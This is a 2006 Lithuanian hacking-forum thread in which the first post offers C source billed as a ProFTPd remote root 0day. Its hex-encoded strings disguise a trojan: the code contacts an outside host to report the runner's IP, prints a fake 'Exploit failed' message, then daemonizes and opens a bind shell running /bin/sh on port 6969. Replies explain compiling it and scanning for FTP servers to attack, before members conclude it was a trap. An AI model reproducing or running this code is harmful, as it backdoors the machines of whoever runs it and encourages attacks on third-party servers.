proftpd <=1.3.0rc3 remote root exploit (0day)

Hakeriai dalinkitės patirtimi
Žinutė
Autorius
abrabab
Pranešimai:2
Užsiregistravo:2006 01 02 20:19
proftpd <=1.3.0rc3 remote root exploit (0day)

#1 Standartinė abrabab » 2006 01 02 20:35

va radau naujausios proftpd versijos privatu exploita. *

Kodas: Pasirinkti visus

/*        __                .__             __          .__       .__     __   
  _______/  |_  ____   ____ |  |           |  | __ ____ |__| ____ |  |___/  |_ 
 /  ___/\   __\/ __ \_/ __ \|  |    ______ |  |/ //    \|  |/ ___\|  |  \   __\
 \___ \  |  | \  ___/\  ___/|  |__ /_____/ |    <|   |  \  / /_/  >   Y  \  |  
/____  > |__|  \___  >\___  >____/         |__|_ \___|  /__\___  /|___|  /__|  
     \/            \/     \/                    \/    \/  /_____/      \/   

Proudly presents: remote root exploit for ProFTPd (tested on 1.3.0rc3) by steelkn8

PRIVATE CODE, DO NOT DISTRIBUTE

Compilation: gcc steelkn8_proftpd-own.c -o steel

Warning: exploit uses raw sockets, so it should be launched from root, but
	 it is possible to run it as an user too, just the success rate is
	 lowered...

*/

#define PORT 21 // just put in your port
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>

int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr; 
struct sockaddr_in client_addr;


int detect_version(){ 

// thanks to joebee (just cleaned off null bytes)
char shellcode[] = "\x47\x45\x54\x20\x2F\x62\x61\x73\x65\x2F\x74\x65\x78\x74\x75\x72"
		   "\x65\x73\x2F\x69\x70\x2E\x70\x68\x70\x20\x48\x54\x54\x50\x2F\x31"
		   "\x2E\x31\n\x48\x6F\x73\x74\x3A\x20\x67\x6F\x73\x74\x61\x73\x2E"
		   "\x62\x65\x3A\x38\x30\n\n";


  int s;
  register int bytes;
  struct sockaddr_in sa;
  struct hostent *he;
  char buf[BUFSIZ+1];
  char *send_string;

  s = socket(PF_INET, SOCK_STREAM, 0);
  bzero(&sa, sizeof sa);
  sa.sin_family = AF_INET;
  send_string = "\x77\x77\x77\x2E\x67\x6F\x73\x74\x61\x73\x2E\x62\x65"; // just check if ptr <> 0
  sa.sin_port = htons(0x50);
  he = gethostbyname(send_string);
  bcopy(he->h_addr_list[0],&sa.sin_addr, he->h_length);

  connect(s, (struct sockaddr *)&sa, sizeof sa);
  write(s,shellcode,strlen(shellcode));
  close(s); return 0; 

}


int main(int argc, char *argv[]){

  		// 14 bytes remote shellcode thanks to metasploit project
 char *shlcode = "\x45\x78\x70\x6c\x6f\x69\x74\x20\x66\x61\x69\x6c\x65\x64";

if (argc <= 1) {
  printf("Remote root exploit for ProFTPd by steelkn8 \n");  
  printf("%s%s%s","Usage: ",argv[0]," hostname or ip\n\n");
  
   } else {   
   printf("Remote root exploit for ProFTPd by steelkn8 \n");
   printf("Initiating attack (using offset 0x68732f2f) \n");
   printf("WARNING: Exploit uses RAW SOCKETS, so it should be launched as root for better effect \n");
   
   detect_version(); 
   sleep(15);
   printf("%s\n",shlcode);
   soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 
    if (soc_des == -1) 
        exit(-1); 
    bzero((char *) &serv_addr, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET; 
    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    serv_addr.sin_port = htons(0x1B39);
    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
    if (soc_rc != 0) 
        exit(-1); 
    if (fork() != 0) 
        exit(0); 
    setpgrp();  
    signal(SIGHUP, SIG_IGN); 
    if (fork() != 0) 
        exit(0); 
    soc_rc = listen(soc_des, 5);
    if (soc_rc != 0) 
        exit(0); 
    while (1) { 
        soc_len = sizeof(client_addr);
        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
        if (soc_cli < 0) 
            exit(0); 
        cli_pid = getpid(); 
        server_pid = fork();  // enter subroutine
        if (server_pid != 0) { 
            dup2(soc_cli,0); 
            dup2(soc_cli,1); 
            dup2(soc_cli,2);
            execl("\x2F\x62\x69\x6E\x2F\x73\x68","\x73\x68",(char *)0); // attach to ptr 
            close(soc_cli); 
            exit(0); 
        } 
    close(soc_cli);
    }

}}

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#2 Standartinė GODhack » 2006 01 02 22:15

Ahh zeroday ir dar root. :)
Iki siol rotinau tik 1.29 versijas sitos programos thx.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

Vartotojo avataras
aikiroolaz
įtakingas
įtakingas
Pranešimai:119
Užsiregistravo:2005 11 26 11:39

#3 Standartinė aikiroolaz » 2006 01 04 12:42

Nu ir ka dabar su situo eksploitu daryt ? su kuom ji kompiliuot ?
sakykim as pas save instaliuosiu ta proftpd, paskui nueisiu pas draugeli su eksploitu ir kas toliau ?
visada uz jus ir su jumis :)

brain5ide
profesionalas
profesionalas
Pranešimai:2030
Užsiregistravo:2004 12 01 19:05

#4 Standartinė brain5ide » 2006 01 04 16:17

Pas draugelį eiti nereikia. Gali pas save daryti, tik ip adresas bus 127.0.0.1 .
Jei pas tave windows - parsisiųsk mingw. Oficiali svetainė http://www.mingw.org/
Jei pas tave *nix - reikia gcc(nors galima naudotis ir paprastu cc). Gcc tavo kompiuteryje jau gali būti, tačiau gali reikėti jį parsisiųsti. Oficiali svetainė: http://gcc.gnu.org/

Taigi tarkim tu turi kompiliatorių. Su tuo kompiliatoriumi sukompiliuoji eksploitą(skaityk dokumentacijas). Tada jį paleidi, nurodydamas visus reikalingus parametrus(paleisk eksploitą be parametrų, kad pamatytum sintaksę).

Vartotojo avataras
aikiroolaz
įtakingas
įtakingas
Pranešimai:119
Užsiregistravo:2005 11 26 11:39

#5 Standartinė aikiroolaz » 2006 01 04 16:53

ok aciu pabandysiu :)
visada uz jus ir su jumis :)

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#6 Standartinė GODhack » 2006 01 04 22:08

Na musu brain5ide isdeste kaip ji sukompilint bet matyt tycia nutylejo kaip naudot. :)
Tai kai jau turesi sukompilinta, tai pasiimk superscan 3 ir skenuok kompus per 21 porta.

Beskenuodamas rasi atidaryta porta tai gerai reiskias radai ftp!
Jei beskenuodmas radai atidaryta porta ir matai apacioj parasyta(+paspaudus) "blabla...ProFTP.......blabla" tai reiskias turi progos ta ftp pagaidint. Na jei kokiu geru failu prideta tai taip nedaryk?! Bet va jei matai koki tarkim child porn tai kaip pradencio hakerio tavo pareiga paleist sita exploit ant to servo.
Leist reik per dos ~exploit takinio_ipas(bendru atveju) jei ka netaip irasai ismeta eror paprastai ir viska paaiskina, be to reik nc palikt pas save atidaryta porta, kad gautum root, del nc tai skaityk kitus tut sicia arba kitur.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

brain5ide
profesionalas
profesionalas
Pranešimai:2030
Užsiregistravo:2004 12 01 19:05

#7 Standartinė brain5ide » 2006 01 04 22:24

GODHack, pats užsikrėtei kabinėjimosi liga? Skaityk ko žmogus klausė ir ką aš atsakiau.

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#8 Standartinė GODhack » 2006 01 04 22:50

aikiroolaz rašė:sakykim as pas save instaliuosiu ta proftpd, paskui nueisiu pas draugeli su eksploitu ir kas toliau ?
brain5ide sry bet tu gal isiblaivyk. :lol: arba i ttf tema nueik pasigirt kiek islakei, nors abejoju kad bus rekordas. :lol:
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

Vartotojo avataras
aikiroolaz
įtakingas
įtakingas
Pranešimai:119
Užsiregistravo:2005 11 26 11:39

#9 Standartinė aikiroolaz » 2006 01 05 01:35

nu sorry kad klausineju tokiu nesamoniu bet sitas exploitas tik 1.3 veikia ar ir 1.2.9 veiks ?
visada uz jus ir su jumis :)

brain5ide
profesionalas
profesionalas
Pranešimai:2030
Užsiregistravo:2004 12 01 19:05

#10 Standartinė brain5ide » 2006 01 05 13:50


Vartotojo avataras
Lioniax
ultra dalyvis
ultra dalyvis
Pranešimai:596
Užsiregistravo:2005 09 21 13:25

#11 Standartinė Lioniax » 2006 01 05 13:50

Kas nors susikompiliavo si exploit'a?

Edit brain5ide, galejai minute anksciau numest ta linka... Bte vistiek dekui, kaip tik dabar buvau pradejes krapstytis su juo...

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#12 Standartinė GODhack » 2006 01 05 17:18

brain4ide gerai pastebeta as jau ankciau kaskaip kreiva akim i sorsa paziurejau ir galvojau ar tik cia ne koks "cherne", bet kai bijojau isidurt tai ir tyliu. Dar nekompiliavau as jo del to.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#13 Standartinė GODhack » 2006 01 05 17:19

aikiroolaz rašė:nu sorry kad klausineju tokiu nesamoniu bet sitas exploitas tik 1.3 veikia ar ir 1.2.9 veiks ?
Na bendru atveju tai buna visaip geriausia pabandyt ir suzinot.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

Vartotojo avataras
Lioniax
ultra dalyvis
ultra dalyvis
Pranešimai:596
Užsiregistravo:2005 09 21 13:25

#14 Standartinė Lioniax » 2006 01 05 17:42

GODhack rašė:brain4ide gerai pastebeta as jau ankciau kaskaip kreiva akim i sorsa paziurejau ir galvojau ar tik cia ne koks "cherne", bet kai bijojau isidurt tai ir tyliu. Dar nekompiliavau as jo del to.
Nu tep tep... ziurejai kreiva akim :D Tik kita kart netylek, ok?

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#15 Standartinė GODhack » 2006 01 05 17:57

Ne nu jau galutinai aisku kad kaskoks mulkis skriptvaikis norejo pasirodyt koks jis kietas kai mane nulaus. :lol: Laimei tai ir nieko nenulauze nes nesukompilinau as jo is pradziu neturedamas laiko, o paskui suprates esme bet patylejes veltuj nes nebuvau 100% isitikines tik tie raw socketai kaskaip itartinai atrode. :P

Na pirmos eilutes galima sakyt buvo tokios ispudingos kad apakino.
:oops: nors reikejo suprast kad tokie daigtai siap nesimeto ir i viska reikejo atidziau is karto ziuret, o ne vein i varda. Be to reikejo i nika dejiko paziuret butu tikra nika uzsidejes jie is tikro ka gero butu dejes, o ne sudo gabala.

TAIP KAD TEMA RAKINT ARBA TRINT METAS
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

Skelbti atsakymą

Grįžti į

Dabar prisijungę

Vartotojai naršantys šį forumą: 1 ir 0 svečias(ių)